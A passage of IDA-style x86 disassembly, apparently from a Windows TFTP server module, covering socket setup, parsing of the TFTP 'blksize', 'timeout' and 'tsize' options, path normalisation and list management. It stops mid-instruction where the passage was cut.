mov esi, ds:dword_1001014 push edi mov edi, offset dword_1006120 push edi mov dword_1006124, 3 push dword_1006044 call esi ; dword_1001014 mov ebp, ds:dword_1001038 xor ebx, ebx cmp eax, ebx jnz short loc_1001EA3 call ebp ; dword_1001038 loc_1001EA3: ; CODE XREF: sub_1001E73+2Cj push dword_1005DDC call ds:dword_1001030 mov dword_1006124, 1 mov dword_1006134, ebx mov eax, [esp+10h+arg_0] mov dword_1006138, ebx cmp eax, ebx jnz short loc_1001EDB mov dword_100612C, ebx mov dword_1006130, ebx jmp short loc_1001EFD ; --------------------------------------------------------------------------- loc_1001EDB: ; CODE XREF: sub_1001E73+58j cmp eax, 834h jb short loc_1001EF3 cmp eax, 16A7h mov dword_100612C, 42Ah jbe short loc_1001EF8 loc_1001EF3: ; CODE XREF: sub_1001E73+6Dj mov dword_100612C, eax loc_1001EF8: ; CODE XREF: sub_1001E73+7Ej mov dword_1006130, eax loc_1001EFD: ; CODE XREF: sub_1001E73+66j push edi push dword_1006044 call esi ; dword_1001014 cmp eax, ebx jnz short loc_1001F0C call ebp ; dword_1001038 loc_1001F0C: ; CODE XREF: sub_1001E73+95j mov eax, dword_1005DE0 mov esi, ds:dword_1001054 cmp eax, ebx jz short loc_1001F24 push eax call esi ; dword_1001054 mov dword_1005DE0, ebx loc_1001F24: ; CODE XREF: sub_1001E73+A6j mov eax, dword_1005DDC cmp eax, ebx jz short loc_1001F36 push eax call esi ; dword_1001054 mov dword_1005DDC, ebx loc_1001F36: ; CODE XREF: sub_1001E73+B8j mov eax, dword_1005DD0 cmp eax, ebx jz short loc_1001F4D push eax call ds:dword_100109C pop ecx mov dword_1005DD0, ebx loc_1001F4D: ; CODE XREF: sub_1001E73+CAj pop edi pop esi pop ebp pop ebx retn 4 sub_1001E73 endp ; =============== S U B R O U T I N E ======================================= sub_1001F54 proc near ; CODE XREF: sub_1002182+1Cp ; sub_1002219+B7p arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] push 0FFFFFFFFh push dword ptr [esi+10h] call ds:dword_1001168 push dword ptr [esi+8] call ds:dword_100111C push dword ptr [esi+14h] call ds:dword_1001118 mov eax, [esi] mov ecx, [esi+4] cmp eax, ecx jnz short loc_1001F90 mov eax, dword_1006038 mov ecx, [eax] mov eax, [eax+4] mov [eax], ecx mov [ecx+4], eax jmp short loc_1001F9A ; --------------------------------------------------------------------------- loc_1001F90: ; CODE XREF: sub_1001F54+29j mov [ecx], eax mov eax, [esi] mov ecx, [esi+4] mov [eax+4], ecx loc_1001F9A: ; CODE XREF: sub_1001F54+3Aj push esi call ds:dword_10010A0 pop ecx pop esi retn 4 sub_1001F54 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_1001FA6 proc near ; CODE XREF: sub_10018DB+3Dp ; sub_1002219+1Dp var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx push ecx push ebx mov ebx, [ebp+arg_0] push esi push edi xor edi, edi lea eax, [ebp+var_4] push edi push eax push edi mov [ebp+var_4], edi mov [ebp+var_8], 0C0000017h mov [ebx], edi call sub_1003A4A cmp eax, edi jz short loc_1001FD3 cmp eax, 7Ah jnz short loc_100201A loc_1001FD3: ; CODE XREF: sub_1001FA6+26j push [ebp+var_4] call ds:dword_1001094 mov esi, eax pop ecx cmp esi, edi jz short loc_100201A loc_1001FE3: ; CODE XREF: sub_1001FA6+63j lea eax, [ebp+var_4] push edi push eax push esi call sub_1003A4A cmp eax, edi jz short loc_1002015 cmp eax, 7Ah jnz short loc_100201A push [ebp+var_4] push esi call ds:dword_1001098 pop ecx cmp eax, edi pop ecx jz short loc_100200B mov esi, eax jmp short loc_1001FE3 ; --------------------------------------------------------------------------- loc_100200B: ; CODE XREF: sub_1001FA6+5Fj push esi call ds:dword_10010A0 pop ecx jmp short loc_100201A ; --------------------------------------------------------------------------- loc_1002015: ; CODE XREF: sub_1001FA6+4Aj mov [ebp+var_8], edi mov [ebx], esi loc_100201A: ; CODE XREF: sub_1001FA6+2Bj ; sub_1001FA6+3Bj ... mov eax, [ebp+var_8] pop edi pop esi pop ebx leave retn 4 sub_1001FA6 endp ; =============== S U B R O U T I N E ======================================= sub_1002024 proc near ; CODE XREF: sub_100205A+B7p arg_0 = dword ptr 4 arg_4 = dword ptr 8 push [esp+arg_0] call ds:dword_1001120 test eax, eax jz short locret_1002057 push edi mov edi, eax or ecx, 0FFFFFFFFh xor eax, eax repne scasb not ecx sub edi, ecx push esi mov eax, ecx mov esi, edi mov edi, [esp+8+arg_4] shr ecx, 2 rep movsd mov ecx, eax and ecx, 3 rep movsb pop esi pop edi locret_1002057: ; CODE XREF: sub_1002024+Cj retn 8 sub_1002024 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_100205A proc near ; CODE XREF: sub_10018DB+64p ; sub_1002219+65p ... var_28 = byte ptr -28h var_14 = word ptr -14h var_12 = word ptr -12h var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 28h push ebx push esi xor esi, esi push edi mov [ebp+var_4], esi loc_1002068: ; CODE XREF: sub_100205A+5Dj push 1 push esi push esi push esi push 2 push 2 call ds:dword_10010F4 mov ebx, eax cmp ebx, 0FFFFFFFFh jz short loc_100209D xor eax, eax lea edi, [ebp+var_14] stosd stosd stosd push offset aUdp ; "udp" push offset aTftp ; "tftp" stosd call ds:dword_1001128 cmp eax, esi jnz short loc_10020B9 jmp short loc_10020B1 ; --------------------------------------------------------------------------- loc_100209D: ; CODE XREF: sub_100205A+22j call ds:dword_10010F8 push 2EEh call ds:dword_100106C inc [ebp+var_4] loc_10020B1: ; CODE XREF: sub_100205A+41j cmp [ebp+var_4], 0Ah jge short loc_10020E6 jmp short loc_1002068 ; --------------------------------------------------------------------------- loc_10020B9: ; CODE XREF: sub_100205A+3Fj mov [ebp+var_14], 2 mov ax, [eax+8] mov [ebp+var_12], ax mov eax, [ebp+arg_0] mov [ebp+var_10], eax lea eax, [ebp+var_14] push 10h push eax push ebx call ds:dword_1001124 test eax, eax jz short loc_10020E6 call ds:dword_1001038 jmp short loc_100215E ; --------------------------------------------------------------------------- loc_10020E6: ; CODE XREF: sub_100205A+5Bj ; sub_100205A+82j cmp ebx, 0FFFFFFFFh jz short loc_100215E push 20h call ds:dword_1001094 mov esi, eax pop ecx test esi, esi jz short loc_100213D push 8 xor eax, eax pop ecx mov edi, esi rep stosd mov eax, [ebp+arg_0] lea ecx, [ebp+var_28] push ecx push eax mov [esi+8], ebx mov [esi+0Ch], eax call sub_1002024 xor eax, eax push eax push eax push eax push eax call ds:dword_1001040 mov edi, eax test edi, edi jz short loc_1002140 push 1 push edi push ebx mov [esi+14h], edi call sub_100188E test eax, eax mov [esi+10h], eax jnz short loc_1002162 jmp short loc_1002140 ; --------------------------------------------------------------------------- loc_100213D: ; CODE XREF: sub_100205A+9Ej mov edi, [ebp+arg_0] loc_1002140: ; CODE XREF: sub_100205A+CCj ; sub_100205A+E1j push ebx call ds:dword_100111C test edi, edi jz short loc_1002152 push edi call ds:dword_1001054 loc_1002152: ; CODE XREF: sub_100205A+EFj test esi, esi jz short loc_100215E push esi call ds:dword_10010A0 pop ecx loc_100215E: ; CODE XREF: sub_100205A+8Aj ; sub_100205A+8Fj ... xor eax, eax jmp short loc_100217B ; --------------------------------------------------------------------------- loc_1002162: ; CODE XREF: sub_100205A+DFj mov eax, dword_1006038 mov dword ptr [esi+4], offset dword_1006038 mov [esi], eax mov [eax+4], esi mov dword_1006038, esi mov eax, esi loc_100217B: ; CODE XREF: sub_100205A+106j pop edi pop esi pop ebx leave retn 4 sub_100205A endp ; =============== S U B R O U T I N E ======================================= sub_1002182 proc near ; CODE XREF: sub_1002219:loc_1002298p mov ecx, dword_1006038 push esi mov esi, offset dword_1006038 xor eax, eax cmp ecx, esi jz short loc_10021B3 push edi loc_1002195: ; CODE XREF: sub_1002182+2Ej cmp dword ptr [ecx+18h], 0 mov edi, [ecx] jnz short loc_10021A8 push ecx call sub_1001F54 push 1 pop eax jmp short loc_10021AC ; --------------------------------------------------------------------------- loc_10021A8: ; CODE XREF: sub_1002182+19j and dword ptr [ecx+18h], 0 loc_10021AC: ; CODE XREF: sub_1002182+24j cmp edi, esi mov ecx, edi jnz short loc_1002195 pop edi loc_10021B3: ; CODE XREF: sub_1002182+10j pop esi retn sub_1002182 endp ; =============== S U B R O U T I N E ======================================= sub_10021B5 proc near ; CODE XREF: sub_1002219+43p arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov edx, [esp+arg_4] push esi mov ecx, offset dword_1006038 and dword ptr [edx], 0 mov eax, dword_1006038 loc_10021C7: ; CODE XREF: sub_10021B5+21j cmp eax, ecx jz short loc_10021DF mov esi, [eax+0Ch] cmp esi, [esp+4+arg_0] jz short loc_10021D8 mov eax, [eax] jmp short loc_10021C7 ; --------------------------------------------------------------------------- loc_10021D8: ; CODE XREF: sub_10021B5+1Dj push 1 mov [edx], eax pop eax jmp short loc_10021E1 ; --------------------------------------------------------------------------- loc_10021DF: ; CODE XREF: sub_10021B5+14j xor eax, eax loc_10021E1: ; CODE XREF: sub_10021B5+28j pop esi retn 8 sub_10021B5 endp ; =============== S U B R O U T I N E ======================================= sub_10021E5 proc near ; CODE XREF: .text:01001DB0p arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov edx, [esp+arg_4] push esi mov ecx, offset dword_1006038 and dword ptr [edx], 0 mov eax, dword_1006038 loc_10021F7: ; CODE XREF: sub_10021E5+21j cmp eax, ecx jz short loc_100220A mov esi, [eax+8] cmp esi, [esp+4+arg_0] jz short loc_1002208 mov eax, [eax] jmp short loc_10021F7 ; --------------------------------------------------------------------------- loc_1002208: ; CODE XREF: sub_10021E5+1Dj mov [edx], eax loc_100220A: ; CODE XREF: sub_10021E5+14j mov eax, [edx] pop esi neg eax sbb eax, eax and al, 0A9h add eax, 57h retn 8 sub_10021E5 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_1002219 proc near ; DATA XREF: sub_10018DB+CBo var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 0Ch push ebx push esi push edi xor esi, esi push offset dword_1006020 mov [ebp+var_C], esi call ds:dword_1001058 lea eax, [ebp+var_4] push eax call sub_1001FA6 test eax, eax jnz short loc_10022A9 mov eax, [ebp+var_4] xor ebx, ebx cmp [eax], esi jbe short loc_1002298 loc_1002248: ; CODE XREF: sub_1002219+7Dj mov eax, [eax+esi+4] test eax, eax jz short loc_100228D cmp eax, 100007Fh jz short loc_100228D lea ecx, [ebp+var_8] push ecx push eax call sub_10021B5 test eax, eax jz short loc_1002271 mov eax, [ebp+var_8] mov dword ptr [eax+18h], 1 jmp short loc_100228D ; --------------------------------------------------------------------------- loc_1002271: ; CODE XREF: sub_1002219+4Aj mov eax, [ebp+var_4] push 1 pop edi push dword ptr [eax+esi+4] mov [ebp+var_C], edi call sub_100205A test eax, eax mov [ebp+var_8], eax jz short loc_100228D mov [eax+18h], edi loc_100228D: ; CODE XREF: sub_1002219+35j ; sub_1002219+3Cj ... mov eax, [ebp+var_4] inc ebx add esi, 18h cmp ebx, [eax] jb short loc_1002248 loc_1002298: ; CODE XREF: sub_1002219+2Dj call sub_1002182 push [ebp+var_4] mov esi, eax call ds:dword_10010A0 pop ecx loc_10022A9: ; CODE XREF: sub_1002219+24j cmp [ebp+var_C], 0 jnz short loc_10022E9 test esi, esi jnz short loc_10022E9 mov eax, dword_1006038 mov edi, offset dword_1006038 cmp eax, edi jz short loc_10022E9 loc_10022C1: ; CODE XREF: sub_1002219+CEj mov [ebp+var_8], eax mov ebx, [eax] test byte ptr [eax+1Ch], 1 jnz short loc_10022E3 mov esi, [eax+0Ch] push eax call sub_1001F54 push esi call sub_100205A test eax, eax jz short loc_10022E3 or dword ptr [eax+1Ch], 1 loc_10022E3: ; CODE XREF: sub_1002219+B1j ; sub_1002219+C4j cmp ebx, edi mov eax, ebx jnz short loc_10022C1 loc_10022E9: ; CODE XREF: sub_1002219+94j ; sub_1002219+98j ... push offset dword_1006100 push offset dword_1005E00 call sub_1003A44 push offset dword_1006020 call ds:dword_100104C pop edi pop esi pop ebx leave retn 8 sub_1002219 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_100230A proc near ; CODE XREF: sub_1001A91+242p ; sub_10023D8+23Cp ... var_FFBC = word ptr -0FFBCh var_FFBA = word ptr -0FFBAh var_FFB8 = byte ptr -0FFB8h arg_0 = dword ptr 8 arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp mov eax, 0FFBCh call sub_1003A3E push ebx push esi mov esi, ds:dword_1001104 push edi push 5 call esi ; dword_1001104 mov edi, [ebp+arg_C] mov [ebp+var_FFBC], ax push edi call esi ; dword_1001104 cmp [ebp+arg_10], 0 mov [ebp+var_FFBA], ax jz short loc_1002369 mov edi, [ebp+arg_10] or ecx, 0FFFFFFFFh xor eax, eax lea edx, [ebp+var_FFB8] repne scasb not ecx sub edi, ecx mov eax, ecx mov esi, edi mov edi, edx shr ecx, 2 rep movsd mov ecx, eax and ecx, 3 rep movsb mov edi, [ebp+arg_10] jmp short loc_10023A2 ; --------------------------------------------------------------------------- loc_1002369: ; CODE XREF: sub_100230A+32j cmp di, 9 jb short loc_1002371 xor edi, edi loc_1002371: ; CODE XREF: sub_100230A+63j movzx eax, di or ecx, 0FFFFFFFFh lea ebx, [ebp+var_FFB8] mov edx, off_1005CC0[eax*4] xor eax, eax mov edi, edx repne scasb not ecx sub edi, ecx mov eax, ecx mov esi, edi mov edi, ebx shr ecx, 2 rep movsd mov ecx, eax and ecx, 3 rep movsb mov edi, edx loc_10023A2: ; CODE XREF: sub_100230A+5Dj or ecx, 0FFFFFFFFh xor eax, eax repne scasb push 10h push [ebp+arg_0] not ecx dec ecx push eax add ecx, 5 lea eax, [ebp+var_FFBC] push ecx push eax push [ebp+arg_8] call ds:dword_1001130 cmp eax, 0FFFFFFFFh jnz short loc_10023D1 call ds:dword_10010F8 loc_10023D1: ; CODE XREF: sub_100230A+BFj pop edi pop esi pop ebx leave retn 14h sub_100230A endp ; =============== S U B R O U T I N E ======================================= sub_10023D8 proc near ; CODE XREF: sub_1002F31+302p ; sub_100333A+26Dp arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch arg_C = dword ptr 10h arg_10 = dword ptr 14h arg_14 = dword ptr 18h mov eax, [esp+arg_0] push ebx push ebp push esi mov esi, [esp+0Ch+arg_10] mov dword ptr [eax+20h], 200h mov dword ptr [eax+28h], 0Ah mov eax, [esp+0Ch+arg_14] push edi mov ecx, 3FEFh and dword ptr [eax], 0 xor eax, eax mov edi, esi push 6 rep stosd call ds:dword_1001104 mov [esi], ax lea ebx, [esi+2] mov ebp, [esp+10h+arg_4] cmp byte ptr [ebp+0], 0 jz loc_10025E4 loc_1002420: ; CODE XREF: sub_10023D8+202j mov esi, ds:dword_100115C push offset aBlksize ; "blksize" push ebp call esi ; dword_100115C pop ecx test eax, eax pop ecx jnz short loc_1002498 mov edi, ebp or ecx, 0FFFFFFFFh repne scasb not ecx sub edi, ecx push 8 mov eax, ecx mov esi, edi mov edi, ebx shr ecx, 2 rep movsd mov ecx, eax and ecx, 3 rep movsb pop esi add ebp, esi add ebx, esi push ebp call ds:dword_1001160 pop ecx cmp eax, esi mov ecx, [esp+10h+arg_0] mov [ecx+20h], eax jb loc_10025FD cmp eax, 0FFB8h ja loc_10025FD cmp eax, 5B0h jnz short loc_100248F mov dword ptr [ecx+20h], 200h sub ebx, esi jmp loc_10025C6 ; --------------------------------------------------------------------------- loc_100248F: ; CODE XREF: sub_10023D8+A7j push 0Ah push ebx push eax jmp loc_1002597 ; --------------------------------------------------------------------------- loc_1002498: ; CODE XREF: sub_10023D8+5Aj push offset aTimeout_0 ; "timeout" push ebp call esi ; dword_100115C pop ecx test eax, eax pop ecx jnz short loc_100251A mov edi, ebp or ecx, 0FFFFFFFFh repne scasb not ecx sub edi, ecx add ebp, 8 mov eax, ecx mov esi, edi mov edi, ebx push ebp shr ecx, 2 rep movsd mov ecx, eax add ebx, 8 and ecx, 3 rep movsb call ds:dword_1001160 pop ecx mov ecx, [esp+10h+arg_0] push 1 pop edx cmp eax, edx mov [ecx+28h], eax jl loc_1002602 cmp eax, 0FFh jg loc_1002602 mov eax, [esp+10h+arg_14] mov edi, ebp or ecx, 0FFFFFFFFh mov [eax], edx xor eax, eax repne scasb not ecx sub edi, ecx mov eax, ecx mov esi, edi mov edi, ebx shr ecx, 2 rep movsd mov ecx, eax and ecx, 3 rep movsb mov edi, ebp jmp loc_10025A2 ; --------------------------------------------------------------------------- loc_100251A: ; CODE XREF: sub_10023D8+CCj push offset aTsize ; "tsize" push ebp call esi ; dword_100115C pop ecx mov edi, ebp test eax, eax pop ecx jnz loc_10025B2 or edx, 0FFFFFFFFh xor eax, eax mov ecx, edx add ebp, 6 repne scasb not ecx sub edi, ecx mov eax, ecx mov esi, edi mov edi, ebx add ebx, 6 shr ecx, 2 rep movsd mov ecx, eax and ecx, 3 cmp [esp+10h+arg_8], 2 rep movsb jnz short loc_100258D mov edi, ebp mov ecx, edx xor eax, eax repne scasb not ecx sub edi, ecx mov eax, ecx mov esi, edi mov edi, ebx shr ecx, 2 rep movsd mov ecx, eax xor eax, eax and ecx, 3 rep movsb mov edi, ebp mov ecx, edx repne scasb not ecx dec ecx mov edi, ebp lea ebx, [ebx+ecx+1] mov ecx, edx jmp short loc_10025CB ; --------------------------------------------------------------------------- loc_100258D: ; CODE XREF: sub_10023D8+180j mov eax, [esp+10h+arg_0] push 0Ah push ebx push dword ptr [eax+24h] loc_1002597: ; CODE XREF: sub_10023D8+BBj call ds:dword_1001164 add esp, 0Ch mov edi, ebx loc_10025A2: ; CODE XREF: sub_10023D8+13Dj or ecx, 0FFFFFFFFh xor eax, eax repne scasb not ecx dec ecx lea ebx, [ebx+ecx+1] jmp short loc_10025C6 ; --------------------------------------------------------------------------- loc_10025B2: ; CODE XREF: sub_10023D8+150j or ecx, 0FFFFFFFFh xor eax, eax repne scasb not ecx dec ecx cmp [ebp+ecx+1], al lea ebp, [ebp+ecx+1] jz short loc_10025E0 loc_10025C6: ; CODE XREF: sub_10023D8+B2j ; sub_10023D8+1D8j mov edi, ebp or ecx, 0FFFFFFFFh loc_10025CB: ; CODE XREF: sub_10023D8+1B3j xor eax, eax repne scasb not ecx dec ecx cmp [ebp+ecx+1], al lea ebp, [ebp+ecx+1] jnz loc_1002420 loc_10025E0: ; CODE XREF: sub_10023D8+1ECj mov esi, [esp+10h+arg_10] loc_10025E4: ; CODE XREF: sub_10023D8+42j mov eax, [esp+10h+arg_C] sub ebx, esi cmp ebx, 2 mov [eax], ebx jnz short loc_10025F4 and dword ptr [eax], 0 loc_10025F4: ; CODE XREF: sub_10023D8+217j xor eax, eax loc_10025F6: ; CODE XREF: sub_10023D8+244j pop edi pop esi pop ebp pop ebx retn 18h ; --------------------------------------------------------------------------- loc_10025FD: ; CODE XREF: sub_10023D8+91j ; sub_10023D8+9Cj push 0 push esi jmp short loc_1002606 ; --------------------------------------------------------------------------- loc_1002602: ; CODE XREF: sub_10023D8+105j ; sub_10023D8+110j push 0 push 8 loc_1002606: ; CODE XREF: sub_10023D8+228j push dword ptr [ecx+8] lea eax, [ecx+0FFF1h] add ecx, 0Ch push eax push ecx call sub_100230A or eax, 0FFFFFFFFh jmp short loc_10025F6 sub_10023D8 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_100261E proc near ; CODE XREF: sub_1002F31+130p ; sub_100333A+150p arg_0 = dword ptr 8 push ebp mov ebp, esp push ebx mov ebx, [ebp+arg_0] push esi push edi mov al, [ebx] mov ecx, ebx mov esi, ebx mov [ebp+arg_0], ebx loc_1002630: ; CODE XREF: sub_100261E+22j test al, al jz short loc_1002642 cmp al, 5Ch jz short loc_100263C cmp al, 2Fh jnz short loc_1002642 loc_100263C: ; CODE XREF: sub_100261E+18j mov al, [ecx+1] inc ecx jmp short loc_1002630 ; --------------------------------------------------------------------------- loc_1002642: ; CODE XREF: sub_100261E+14j ; sub_100261E+1Cj ... mov al, [ecx] test al, al jz loc_10026E4 cmp al, 2Eh jnz loc_100271C mov dl, [ecx+1] lea edi, [ecx+1] cmp dl, 5Ch jz loc_1002718 cmp dl, 2Fh jz loc_1002718 cmp dl, al jnz loc_1002703 mov dl, [ecx+2] lea edi, [ecx+2] cmp dl, 5Ch jz short loc_1002684 cmp dl, 2Fh jnz short loc_1002703 loc_1002684: ; CODE XREF: sub_100261E+5Fj dec esi mov ecx, edi dec esi cmp esi, ebx jbe short loc_10026E0 loc_100268C: ; CODE XREF: sub_100261E+7Bj mov al, [esi] cmp al, 5Ch jz short loc_100269B cmp al, 2Fh jz short loc_100269B dec esi cmp esi, ebx jnb short loc_100268C loc_100269B: ; CODE XREF: sub_100261E+72j ; sub_100261E+76j inc esi loc_100269C: ; CODE XREF: sub_100261E+8Ej ; sub_100261E+EEj ... cmp esi, [ebp+arg_0] jbe short loc_10026AE cmp byte ptr [esi-1], 20h lea eax, [esi-1] jnz short loc_10026AE mov esi, eax jmp short loc_100269C ; --------------------------------------------------------------------------- loc_10026AE: ; CODE XREF: sub_100261E+81j ; sub_100261E+8Aj mov al, [ecx] cmp al, 5Ch jz short loc_10026B8 cmp al, 2Fh jnz short loc_1002642 loc_10026B8: ; CODE XREF: sub_100261E+94j cmp esi, ebx jz short loc_10026CB mov al, [esi-1] cmp al, 5Ch jz short loc_10026CB cmp al, 2Fh jz short loc_10026CB mov byte ptr [esi], 5Ch inc esi loc_10026CB: ; CODE XREF: sub_100261E+9Cj ; sub_100261E+A3j ... inc ecx jz short loc_10026D8 mov al, [ecx] cmp al, 5Ch jz short loc_10026CB cmp al, 2Fh jz short loc_10026CB loc_10026D8: ; CODE XREF: sub_100261E+AEj mov [ebp+arg_0], esi jmp loc_1002642 ; --------------------------------------------------------------------------- loc_10026E0: ; CODE XREF: sub_100261E+6Cj xor eax, eax jmp short loc_10026FC ; --------------------------------------------------------------------------- loc_10026E4: ; CODE XREF: sub_100261E+28j mov cl, [esi-1] lea eax, [esi-1] cmp cl, 5Ch jz short loc_10026F4 cmp cl, 2Fh jnz short loc_10026F6 loc_10026F4: ; CODE XREF: sub_100261E+CFj mov esi, eax loc_10026F6: ; CODE XREF: sub_100261E+D4j and byte ptr [esi], 0 push 1 pop eax loc_10026FC: ; CODE XREF: sub_100261E+C4j pop edi pop esi pop ebx pop ebp retn 4 ; --------------------------------------------------------------------------- loc_1002703: ; CODE XREF: sub_100261E+50j ; sub_100261E+64j ... mov [esi], al mov al, [ecx+1] inc esi inc ecx test al, al jz short loc_100269C cmp al, 5Ch jz short loc_100269C cmp al, 2Fh jnz short loc_1002703 jmp short loc_100269C ; --------------------------------------------------------------------------- loc_1002718: ; CODE XREF: sub_100261E+3Fj ; sub_100261E+48j mov ecx, edi jmp short loc_100269C ; --------------------------------------------------------------------------- loc_100271C: ; CODE XREF: sub_100261E+30j ; sub_100261E+11Dj test al, al jz loc_100269C cmp al, 5Ch jz loc_100269C cmp al, 2Fh jz loc_100269C mov [esi], al mov al, [ecx+1] inc esi inc ecx jmp short loc_100271C sub_100261E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_100273D proc near ; CODE XREF: sub_1002F31+18Cp ; sub_100333A+197p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp push ebx push esi mov esi, [ebp+arg_8] push edi mov edi, esi or ecx, 0FFFFFFFFh xor eax, eax mov edx, [ebp+arg_0] repne scasb not ecx dec ecx mov edi, edx mov ebx, ecx or ecx, 0FFFFFFFFh repne scasb not ecx dec ecx cmp byte ptr [ebx+esi-1], 5Ch mov edi, ecx setz al xor ecx, ecx cmp byte ptr [edx], 5Ch setz cl test eax, eax jnz short loc_1002784 test ecx, ecx jnz short loc_1002784 mov [ebp+arg_8], 1 jmp short loc_1002791 ; --------------------------------------------------------------------------- loc_1002784: ; CODE XREF: sub_100273D+38j ; sub_100273D+3Cj and [ebp+arg_8], 0 test eax, eax jz short loc_1002791 test ecx, ecx jz short loc_1002791 dec ebx loc_1002791: ; CODE XREF: sub_100273D+45j ; sub_100273D+4Dj ... mov eax, [ebp+arg_8] mov ecx, [ebp+arg_4] add eax, edi add eax, ebx dec ecx cmp eax, ecx jbe short loc_10027A4 xor eax, eax jmp short loc_10027DA ; --------------------------------------------------------------------------- loc_10027A4: ; CODE XREF: sub_100273D+61j mov eax, [ebp+arg_8] inc edi add eax, ebx push edi add eax, edx push edx push eax call ds:dword_1001144 mov eax, [ebp+arg_0] mov ecx, ebx mov edx, ecx mov edi, eax shr ecx, 2 rep movsd mov ecx, edx add esp, 0Ch and ecx, 3 cmp [ebp+arg_8], 0 rep movsb jz short loc_10027D7 mov byte ptr [ebx+eax], 5Ch loc_10027D7: ; CODE XREF: sub_100273D+94j push 1 pop eax loc_10027DA: ; CODE XREF: sub_100273D+65j pop edi pop esi pop ebx pop ebp retn 0Ch sub_100273D endp ; =============== S U B R O U T I N E ======================================= sub_10027E1 proc near ; CODE XREF: sub_1002B5E+C7p ; sub_1002F31+36Bp arg_0 = dword ptr 4 arg_4 = dword ptr 8 push esi mov esi, [esp+4+arg_0] push edi mov ecx, [esi+10024h] lea eax, [esi+10024h] test ecx, ecx jz short loc_1002817 and dword ptr [eax], 0 mov eax, [esp+8+arg_4] and word ptr [esi+10014h], 0 mov [esi+10020h], ecx mov eax, [eax+20h] mov [esi+1001Ch], eax jmp short loc_1002877 ; --------------------------------------------------------------------------- loc_1002817: ; CODE XREF: sub_10027E1+14j mov edi, ds:dword_1001104 push 3 call edi ; dword_1001104 mov [esi+38h], ax mov ax, [esi+10014h] push eax call edi ; dword_1001104 mov [esi+3Ah], ax mov eax, [esp+8+arg_4] push dword ptr [eax+20h] lea eax, [esi+3Ch] push eax push dword ptr [esi+1002Ch] call ds:dword_1001090 add esp, 0Ch cmp eax, 0FFFFFFFFh mov [esi+1001Ch], eax jnz short loc_100286E mov esi, ds:dword_10010AC call esi ; dword_10010AC call esi ; dword_10010AC push dword ptr [eax] call ds:dword_100102C xor eax, eax jmp short loc_100287A ; --------------------------------------------------------------------------- loc_100286E: ; CODE XREF: sub_10027E1+75j add eax, 4 mov [esi+10020h], eax loc_1002877: ; CODE XREF: sub_10027E1+34j push 1 pop eax loc_100287A: ; CODE XREF: sub_10027E1+8Bj pop edi pop esi retn 8 sub_10027E1 endp ; =============== S U B R O U T I N E ======================================= sub_100287F proc near ; CODE XREF: sub_1002F31+2C6p ; sub_100333A+2CDp arg_0 = dword ptr 4 push esi mov esi, offset dword_1006080 push esi call ds:dword_1001058 mov ecx, dword_1006098 push esi mov eax, [esp+8+arg_0] mov [eax], ecx mov dword ptr [eax+4], offset dword_1006098 mov [ecx+4], eax mov dword_1006098, eax call ds:dword_100104C push 1 pop eax pop esi retn 4 sub_100287F endp ; =============== S U B R O U T I N E ======================================= sub_10028B5 proc near ; CODE XREF: sub_1002A3D+Cp ; sub_1002EC8+8p ... arg_0 = dword ptr 4 push ebx mov ebx, ds:dword_1001058 push esi push edi mov edi, offset dword_1006080 push edi call ebx ; dword_1001058 mov eax, dword_1006098 mov ecx, offset dword_1006098 loc_10028D0: ; CODE XREF: sub_10028B5+2Dj cmp eax, ecx jz short loc_10028F2 mov edx, [eax+8] lea esi, [eax-18h] cmp edx, [esp+0Ch+arg_0] jz short loc_10028E4 mov eax, [eax] jmp short loc_10028D0 ; --------------------------------------------------------------------------- loc_10028E4: ; CODE XREF: sub_10028B5+29j push esi call ebx ; dword_1001058 push edi call ds:dword_100104C mov eax, esi jmp short loc_10028FB ; --------------------------------------------------------------------------- loc_10028F2: ; CODE XREF: sub_10028B5+1Dj push edi call ds:dword_100104C xor eax, eax loc_10028FB: ; CODE XREF: sub_10028B5+3Bj pop edi pop esi pop ebx retn 4 sub_10028B5 endp ; =============== S U B R O U T I N E ======================================= sub_1002901 proc near ; CODE XREF: sub_100297A+Ap arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] mov eax, [esi+20h] cmp eax, 0FFFFFFFFh jz short loc_1002915 push eax call ds:dword_100111C loc_1002915: ; CODE XREF: sub_1002901+Bj mov eax, [esi+10004h] test eax, eax jz short loc_100292E push 0 push eax push dword_10060A0 call ds:dword_1001158 loc_100292E: ; CODE XREF: sub_1002901+1Cj push 0 push dword ptr [esi+0FFFCh] call ds:dword_1001168 push dword ptr [esi+0FFF8h] call ds:dword_1001054 push esi call ds:dword_1001028 pop esi retn 4 sub_1002901 endp ; =============== S U B R O U T I N E ======================================= sub_1002953 proc near ; CODE XREF: sub_100297A+2Fp ; sub_100297A+37p arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] mov eax, [esi+1002Ch] cmp eax, 0FFFFFFFFh jz short loc_100296B push eax call ds:dword_100108C pop ecx loc_100296B: ; CODE XREF: sub_1002953+Ej push esi call ds:dword_10010A0 pop ecx pop esi retn 4 sub_1002953 endp ; [00000003 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND] ; =============== S U B R O U T I N E ======================================= sub_100297A proc near ; CODE XREF: sub_10029BA+55p arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] test esi, esi jz short loc_10029B6 push esi call sub_1002901 mov eax, [esi+24h] dec eax jz short loc_10029B0 dec eax jz short loc_10029A8 dec eax jz short loc_10029A0 dec eax jnz short loc_10029B6 push esi call 